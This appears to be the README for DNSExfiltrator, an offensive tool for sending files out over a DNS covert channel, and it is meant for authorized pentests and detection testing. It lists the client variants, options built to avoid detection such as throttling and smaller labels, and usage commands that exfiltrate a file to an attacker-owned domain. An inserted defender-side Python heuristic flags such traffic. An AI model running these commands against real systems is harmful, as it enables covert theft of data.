
Data exfiltration over DNS request covert channel

DNSExfiltrator

Author: Arno0x0x - @Arno0x0x

DNSExfiltrator transfers (exfiltrates) a file over a DNS request covert channel. It is essentially a data leak testing tool that moves data out over a covert channel.

DNSExfiltrator has two sides:

  1. The server side, coming as a single python script (dnsexfiltrator.py), which acts as a custom DNS server, receiving the file
  2. The client side (victim's side), which comes in three flavors:
  • dnsExfiltrator.cs: a C# script that can be compiled with csc.exe to provide a Windows managed executable
  • Invoke-DNSExfiltrator.ps1: a PowerShell script providing the exact same functionality by wrapping the dnsExfiltrator assembly
  • dnsExfiltrator.js: a JScript script, a conversion of the dnsExfiltrator DLL assembly made with DotNetToJScript, providing the exact same functionality

In order for the whole thing to work you must own a domain name and set the DNS record (NS) for that domain to point to the server that will run the dnsexfiltrator.py server side.

Features

By default, DNSExfiltrator uses the system's defined DNS server, but you can also set a specific one to use (useful for debugging purposes or for running the server side locally for instance).

Alternatively, using the h parameter, DNSExfiltrator can perform DoH (DNS over HTTP) using the Google or CloudFlare DoH servers.

By default, the data to be exfiltrated is base64URL encoded in order to fit into DNS requests. However, some DNS resolvers break this encoding by altering the case of the letters (fair enough, since FQDNs are not supposed to be case sensitive anyway), and case is obviously significant for the encoding/decoding process. To work around this you can use the -b32 flag to force Base32 encoding of the data, which comes with a small size overhead. If you're using CloudFlare DoH, base32 encoding is applied automatically.

DNSExfiltrator supports basic RC4 encryption of the exfiltrated data, using the provided password to encrypt/decrypt the data.

DNSExfiltrator also provides some optional features to avoid detection:

  • request throttling in order to stay more stealthy when exfiltrating data
  • reduction of the DNS request size (by default it will try to use as many bytes as are left available in each DNS request, for efficiency)
  • reduction of the DNS label size (by default it will try to use the longest supported label size of 63 chars)
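As an added defender-side example (not part of the DNSExfiltrator project), the following Python scores DNS query names for the traits described above: labels filled towards the 63-character maximum, requests packed towards 255 bytes, and a base32 or base64url payload that keeps its shape even when a resolver mangles the case. The "client qname" log format, the thresholds, the three-of-four rule and the "last two labels are the zone" rule are assumptions for the example.

```python
import base64
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits per character of s (0.0 for an empty string)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def score_qname(qname: str, zone_labels: int = 2) -> dict:
    """Heuristic flags for one query name. The last zone_labels labels are treated as the
    zone (an assumption for this example; real code should consult a public-suffix list)."""
    labels = qname.rstrip(".").split(".")
    payload = "".join(labels[:-zone_labels])          # subdomain part that would carry data
    longest = max((len(l) for l in labels[:-zone_labels]), default=0)
    flags = {
        "long_label": longest >= 40,                  # client fills labels up to the 63-char maximum
        "long_name": len(qname) >= 150,               # client packs each request close to 255 bytes
        "high_entropy": shannon_entropy(payload) >= 3.5,
        "digit_mix": any(c.isdigit() for c in payload) and any(c.isalpha() for c in payload),
    }
    flags["suspicious"] = sum(flags.values()) >= 3    # require three of the four signals
    return flags

def find_suspicious(log_text: str, zone_labels: int = 2) -> Counter:
    """Count suspicious names per (client, zone) over 'client qname' log lines."""
    hits = Counter()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        client, qname = parts
        if score_qname(qname, zone_labels)["suspicious"]:
            hits[(client, ".".join(qname.rstrip(".").split(".")[-zone_labels:]))] += 1
    return hits

def encoded_name(data: bytes, zone: str, b32: bool) -> str:
    """Constructed sample only: encode data and split it into 63-char labels under zone."""
    enc = base64.b32encode(data) if b32 else base64.urlsafe_b64encode(data)
    s = enc.decode().rstrip("=")
    return ".".join(s[i:i + 63] for i in range(0, len(s), 63)) + "." + zone

# Constructed sample log (not from the page): benign lookups and two encoded names,
# the second one lowercased as a case-mangling resolver would pass it on.
SAMPLE_LOG = "\n".join([
    "10.0.0.5 www.example.com",
    "10.0.0.5 mail.example.com",
    "10.0.0.7 " + encoded_name(bytes(range(120)), "mydomain.com", b32=True),
    "10.0.0.7 " + encoded_name(bytes(range(120)), "mydomain.com", b32=False).lower(),
    "10.0.0.9 cdn-static-assets.example.net",
])
```

The length and entropy thresholds need tuning against a baseline of the environment's own DNS traffic, since CDN and telemetry hostnames can trip individual signals on their own.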

Dependencies

The only dependency is on the server side, as the dnsexfiltrator.py script relies on the external dnslib library. You can install it using pip:

pip install -r requirements.txt

Usage

SERVER SIDE

Start the dnsexfiltrator.py script passing it the domain name and decryption password to be used:

root@kali:~# ./dnsexfiltrator.py -d mydomain.com -p password

CLIENT SIDE

You can either use the compiled version, or the PowerShell wrapper (which is basically the same thing) or the JScript wrapper. In any case, the parameters are the same, with just a slight difference in the way of passing them in PowerShell.

1/ Using the C# compiled Windows executable (which you can find in the release directory):

dnsExfiltrator.exe <file> <domainName> <password> [-b32] [h=google|cloudflare] [s=<DNS_server>] [t=<throttleTime>] [r=<requestMaxSize>] [l=<labelMaxSize>]
      file:           [MANDATORY] The file name to the file to be exfiltrated.
      domainName:     [MANDATORY] The domain name to use for DNS requests.
      password:       [MANDATORY] Password used to encrypt the data to be exfiltrated.
      -b32:           [OPTIONNAL] Use base32 encoding of data. Might be required by some DNS resolver break case.
      h:              [OPTIONNAL] Use Google or CloudFlare DoH (DNS over HTTP) servers.
      DNS_Server:     [OPTIONNAL] The DNS server name or IP to use for DNS requests. Defaults to the system one.
      throttleTime:   [OPTIONNAL] The time in milliseconds to wait between each DNS request.
      requestMaxSize: [OPTIONNAL] The maximum size in bytes for each DNS request. Defaults to 255 bytes..
      labelMaxSize:   [OPTIONNAL] The maximum size in chars for each DNS request label (subdomain). Defaults to 63 chars.

2/ Using the PowerShell script, call it in whichever way you prefer (you probably know tons of ways of invoking a PowerShell script) along with the script parameters. Most basic example:

c:\DNSExfiltrator> powershell
PS c:\DNSExfiltrator> Import-Module .\Invoke-DNSExfiltrator.ps1
PS c:\DNSExfiltrator> Invoke-DNSExfiltrator -i inputFile -d mydomain.com -p password -s my.dns.server.com -t 500
[...]

Check the EXAMPLES section in the script file for further usage examples.

3/ Using the JScript script, pass it the exact same arguments as you would with the standalone Windows executable:

cscript.exe dnsExiltrator.js inputFile mydomain.com password

Or, with some options:

cscript.exe dnsExiltrator.js inputFile mydomain.com password s=my.dns.server.com t=500

TODO

  • Some will ask for AES encryption instead of RC4, I know... might add it later
  • Display estimated transfer time
  • Do better argument parsing (I'm too lazy to learn how to use a c# argument parsing library, I wish it was as simple as Python)

DISCLAIMER

This tool is intended to be used in a legal and legitimate way only:

  • either on your own systems as a means of learning, of demonstrating what can be done and how, or testing your defense and detection mechanisms
  • on systems on which you've been officially and legitimately authorized to perform security assessments (pentests, security audits)

Quoting Empire's authors: There is no way to build offensive tools useful to the legitimate infosec industry while simultaneously preventing malicious actors from abusing them.
